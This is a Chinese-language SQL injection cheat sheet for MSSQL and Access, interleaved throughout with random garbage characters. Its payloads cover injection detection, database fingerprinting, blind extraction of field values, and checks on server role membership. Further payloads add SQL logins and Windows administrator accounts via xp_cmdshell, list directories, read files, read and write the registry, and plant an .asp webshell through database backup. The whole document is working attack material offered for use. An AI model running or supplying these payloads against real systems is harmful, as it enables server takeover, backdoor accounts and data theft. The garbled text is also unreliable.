1.判断是否有注入;and 1=1 ;and 1=2 TkM8GK-�3�
2.初步判断是否是mssql ;and user>0 TW"
TgO�fd
5(]=?�$$*t
3.注入参数是字符'and [查询条件] and ''=' l q~^&\_#�
�oqc89DEbJ
4.搜索时没过滤参数的'and [查询条件] and '%25'=' A�n{`'U(�l
qk<(�iVUO
5.判断数据库系统 BRLrD/8Le�
cQ} ,q+GR~
;and (select count(*) from sysobjects)>0 mssql 7jQ��Ow�zj
*VG���#SK
;and (select count(*) from msysobjects)>0 access 4�0w,�:��$
N7v��7�b<6
�Tu��"bbc�
&!SdO<agZ�
6.猜数据库 ;and (select Count(*) from [数据库名])>0 p8aGM-+40W
��� ?%Hj,b
7.猜字段 ;and (select Count(字段名) from 数据库名)>0 qcS�lqW�Dk
)"`(+�Ku&c
8.猜字段中记录长度 ;and (select top 1 len(字段名) from 数据库名)>0 ph�
qx�<N@
�<l�opk('7
9.(1)猜字段的ascii值(access) P-o���/a�x
�}6�*�+>?�
;and (select top 1 asc(mid(字段名,1,1)) from 数据库名)>0 o$)pJ#�";F
7o_1P�wKS6
(2)猜字段的ascii值(mssql) �j�^-E,YMC
�ry)g�<OA�
;and (select top 1 unicode(substring(字段名,1,1)) from 数据库名)>0 >4
��4���A
_bR�d2��k,
10.测试权限结构(mssql) �DO`
K_B��
?%-VSL>$w=
U�p*1�j:_O
Xn@\p�5�<�
;and 1=(select IS_SRVROLEMEMBER('sysadmin'));-- hL�K5s1�#K
"��%ou'\}�
;and 1=(select IS_SRVROLEMEMBER('serveradmin'));-- @-qS�[bV
O��9?�t�,1
;and 1=(select IS_SRVROLEMEMBER('setupadmin'));-- �A/��ZZ[B-
V��b�yGr~t
;and 1=(select IS_SRVROLEMEMBER('securityadmin'));-- �+GqK$B(x7
Aq�nDs�r�!
;and 1=(select IS_SRVROLEMEMBER('diskadmin'));-- b&BkT%aA(G
��6Lj=�%�&
;and 1=(select IS_SRVROLEMEMBER('bulkadmin'));-- \]uD"Jqv�#
Fjch<gAofS
;and 1=(select IS_MEMBER('db_owner'));-- &�\),V�1"�
}-4�@�EC>�
zW.I7Z0^
Jmg<mj�q/G
11.添加mssql和系统的帐户 v<C�Z.-r\j
�3>�asl5�4
;exec master.dbo.sp_addlogin username;-- ��{|� �~��
;exec master.dbo.sp_password null,username,password;-- @D��1}��).
W�}�j�el}:
;exec master.dbo.sp_addsrvrolemember sysadmin username;-- PIO�G|��E�
q�w?#~"Ca.
;exec master.dbo.xp_cmdshell 'net user username password u-�qwG/�$E
�:��x�8�8�
/workstations:*/times:all/passwordchg:yes /passwordreq:yes /active:yes /add';-- �$�]LhE:!G
1����1Sflj
;exec master.dbo.xp_cmdshell 'net user username password /add';-- m03D�+�@F�
f4[fXP�;A�
;exec master.dbo.xp_cmdshell 'net localgroup administrators username /add';-- @�N+ }ce�j
0>���{&8�:
KT�L�q~Ru
����f�z�>3
12.(1)遍历目录 ��VS`
�tj�
u*}[fQ`aF�
;create table dirs(paths varchar(100), id int) ]6s7?07�m4
|p�_\pa1&
;insert dirs exec master.dbo.xp_dirtree 'c:\' �^V6cx��2M
�["O/%6b9+
;and (select top 1 paths from dirs)>0 +�\�Uq�=@
Q+bZZMK5,U
;and (select top 1 paths from dirs where paths not in('上步得到的paths'))>) "-�
�2HKs�
|z�.x�� M>
b-��!�+Q)�
p}�}pq~EH/
(2)遍历目录 x;N@_FZ7KY
B�k)E]Fk�|
;create table temp(id nvarchar(255),num1 nvarchar(255),num2 nvarchar(255),num3 nvarchar(255));-- }���SD*@�w
;insert temp exec master.dbo.xp_availablemedia;-- 获得当前所有驱动器 =f~8"j����
-nK\+bTL}
;insert into temp(id) exec master.dbo.xp_subdirs 'c:\';-- 获得子目录列表 omd���oH?
\G4L+Q�/13
;insert into temp(id,num1) exec master.dbo.xp_dirtree 'c:\';-- 获得所有子目录的目录树构 +�;#z"�m]�
B|�I9Ex~�L
;insert into temp(id) exec master.dbo.xp_cmdshell 'type c:\web\index.asp';-- 查看文件的内容 =bKz$��
_W
X�S�#Jy
n�
p�z�r\�<U`
�'0b!lVe��
13.mssql中的存储过程 )}!�Z�^ND*
1F|e/h%��^
xp_regenumvalues 注册表根键, 子键 dlv1liSXL5
LK>A�C9ak<
;exec xp_regenumvalues 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion\Run' 以多个记录集方式返回所有键值 ���?58�,Ja
�|; [XZ ZZ
xp_regread 根键,子键,键值名 mM#�[XKOC<
6&9}M Oc��
;exec xp_regread `��|�uwR5�
�;D8175px;
'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','CommonFilesDir' 返回制定键的值 &[yW}uV<7�
v�M3 b\y�p
xp_regwrite 根键,子键, 值名, 值类型, 值 z�jE|�UK�{
�v�79k{<Ln
值类型有2种REG_SZ 表示字符型,REG_DWORD 表示整型 J^w!�?�n�k
SH��ow~wxw
;exec xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','TestValueName','reg_sz','hello' 写入注册表 \:mZ)f3K=�
t GS>f>�i�
xp_regdeletevalue 根键,子键,值名 n�pCi�q��O
4
�*��n4P
exec xp_regdeletevalue 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','TestValueName' 删除某个值 1�`&� Yg(
JX)%��iJq#
xp_regdeletekey 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion\Testkey' 删除键,包括该键下所有值 wjzR 8g0bQ
Qr.�SPNUFK
n��=��F|bW
OK]��_.v}�
14.mssql的backup创建webshell %VH{bpS|i:
9B)<7JJX!J
use model 0 k�(s��u
�e�'l@M$^�
create table cmd(str image); q 3�nF\Me0
(�/i�?�Fd�
insert into cmd(str) values (''); ?+P� D?�c7
0PP5qeqN2n
backup database model to disk='c:\l.asp'; H�@�u�DP�
-prc+G,qyp
%|�izt��/B
��DS|��HN�
15.mssql内置函数 XG!s+�ShFV
e�)M)q!n�G
;and (select @@version)>0 获得Windows的版本号 O3JBS^;V2�
>OxSr�c@A�
;and user_name()='dbo' 判断当前系统的连接用户是不是sa q?�#���#S'
;�h��~�v,h
;and (select user_name())>0 爆当前系统的连接用户 ^�]zC~�LfG
�']&rPv�kL
;and (select db_name())>0 得到当前连接的数据库 Cs�2F/�M'�
�}!�_o��fe
%G`�G�dG}T
���)`�z�{T
16.简洁的webshell �,9.-A�-Yw
�}7HR<%<�7
use model qdN�t2SO�
^[g7B"`K�5
create table cmd(str image); #d*�)W3e2{
H&*K�pO��L
insert into cmd(str) values (''); qP�5'&!s&!
��BG��9.h!
backup database model to disk='g:\wwwtest\l.asp';
